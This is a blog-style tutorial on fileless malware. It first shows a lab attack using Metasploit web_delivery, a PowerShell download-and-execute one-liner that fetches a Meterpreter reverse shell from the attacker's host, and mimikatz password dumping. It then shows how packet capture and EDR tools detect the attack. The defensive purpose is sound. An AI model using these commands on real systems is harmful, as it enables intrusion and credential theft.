Fileless malware is a method used to compromise a system without writing any file to disk. This allows to remain stealthy and avoid detection from some antiviruses, EPP and EDR solutions.

We will look at how to test this type of attack and then at ways to detect it.

Performing the Attack

The following is an example of how to perform such an attack, gaining a Meterpreter shell on the victim’s machine using Metsaploit (on the attacker’s side) and Powershell (on the victim’s side) without writing anything to disk.

I am using Kali Linux as the Attacker and Windows 7 as the victim.

1st we need to run Metasploit:

msfconsole

msfconsole

To deliver the PowerShell script, we will use exploit/multi/script/web_delivery

use exploit/multi/script/web_delivery
info

description

Metaploit would generate the ps1 file, start a webserver and host it for delivery. We will use PowerShell on the victim’s machine to download the script and meterpreter payload, and load it directly into memory without writing anything to disk.

Now we will look at the parameters that need to be configured:

show options

webdelivery

We need to:

  • Set “Target” to 2 for PSH (PowerShell)
  • Set “LHOST” to the IP of the attacker (in my case, 192.168.1.3)
  • Set the payload we want to use to get the reverse shell (I will use windows/meterpreter/reverse_tcp)

set target 2
set LHOST 192.168.1.3
set payload windows/meterpreter/reverse_tcp

options

We can now execute the payload:

exploit -j

exploit

To gain reverse shell on the victim, we just need to execute the following command (no malware installed, nothing will be written on disk, it will all happen from memory) by replacing the URL at the end with the one provided in the output of Metasploit under “Local IP” (with your IP address and the correct randomly generated filename):

powershell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring(‘http://192.168.1.3:8080/VpBSRDO’);

victim.PNG

We can now see that we have an active session in Metasploit.

sessions

delivered

We could then load mimikatz in memory to dump passwords, without touching the disk.

session -i 1
load mimikatz

Detection

Visibility and detection of such attacks using full packet capture and EDR solutions such as RSA NetWitness for Packets and RSA NetWitness for Endpoint.

With a full packet capture solution (in this case, RSA NetWitness for Packets), it is possible to reconstruct the delivery of the PowerShell script and of the payloads (Meterpreter and mimikatz). This is assuming that the traffic is not encrypted.

Detection from the Network Traffic

Reconstruction of the initial PowerShell script based on full packet capture from the network traffic:

packets1.PNG

Reconstruction of the meterpreter payload based on full packet capture from the network traffic:

packets2.PNG

Detection from the Endpoint

Using some EDR solutions that have visibility into the endpoint’s memory and behavior (not limited to files on disk), it is possible to also have the needed visibility to detect this type of attack even when the network traffic is encrypted. The below is based on RSA NetWitness for Endpoint.

Suspicious Threads detected showing that PowerShell.exe loaded a DLL in memory (meterpreter):

suspicious-threads

By doing static analysis on the in-memory modules, we can try to identify them. We can see strings related to mimikatz in one of the modules:

mimikatzmodule.PNG

And the IP address and Port Number used by the Meterpreter payload hard coded in the second module:

meterpretermpdule.PNG

We can also see suspicious behaviors and IOCs that have been triggered for PowerShell:

powershelliocs

We can also track the behavior of the different processes on the victim’s machine to see how the attack is performed and what commands the attacker has issues after gaining access. In this case:

  • the initial PowerShell command to grab the hosted PowerShell script and load it in memory
  • the executed PowerShell script with all parameter that load the Meterpreter payload in memory
  • the commands executed by the attacker after he gains access (whoami, hostname, ipconfig, netstat -an)

tracking